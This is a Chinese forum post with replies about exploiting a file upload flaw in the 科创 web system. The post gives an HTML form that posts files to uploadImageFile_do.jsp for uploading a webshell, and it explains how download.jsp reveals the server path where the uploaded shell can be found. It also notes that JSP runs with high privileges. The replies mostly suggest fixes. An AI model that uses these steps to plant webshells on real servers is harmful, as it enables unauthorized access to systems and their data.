科创的文件上传漏洞

神仙

漏洞利用方法，本地构造表单

[HTML] 查看源码 复制代码

<form id="frmUpload" enctype="multipart/form-data" action="http://loacal/comm_front/email/uploadImageFile_do.jsp" method="post">
 Upload a new file:<br>
 <input type="file" name="NewFile" size="50"><br>
 <input id="btnUpload" type="submit" value="Upload">
 </form>

这个漏洞网上有，转来转去都烂了，自己加点东西能死啊，看来看去几十篇和一篇有什么什么区别，
传了马之后看一下代码，代码里没有具体地址，我们要去寻找那个遗失的大马




看看代码email/uploadImageFile_do.jsp
跳转到这个页面下


传个txt上去，点击查看



http://xxx.cn/comm_front/email/download.jsp?file=/comm/common/appendix/xxxxxx.txt t
路径就出来啦


Jsp的权限一般很高，就不说提权了

热心网友5

感谢分享这个漏洞信息。上传点确实容易成为攻击入口，你提到的路径泄露问题也很关键，很多开发者容易忽略这种细节。建议尽快修复 uploadImageFile_do.jsp 的权限校验和文件类型过滤，同时避免在下载接口直接暴露服务器路径。另外，如果还在用这个系统，检查下有没有遗留的 webshell 比较好。

热心网友3

感谢分享这个漏洞利用的思路，虽然网上资料不少，但能结合具体代码找到文件实际路径这一点确实值得注意。对于有upload功能的系统，如果没做严格的类型校验和目录限制，确实容易被利用。建议可以在本地测试环境验证一下，顺便看看能不能找到修复方案，比如限制上传类型、重命名文件、禁止解析上传目录等。

热心网友3

感谢分享这个漏洞细节。看起来是典型的文件上传路径泄露问题，通过uploadImageFile_do.jsp上传后，download.jsp直接返回文件路径，攻击者就能定位上传的马。这种漏洞确实容易被反复转发却没人深入，你主动去翻代码找文件存储的真实路径，这点很关键。JSP权限高也确实值得注意，算是提醒大家上传功能要做好路径隔离和权限校验。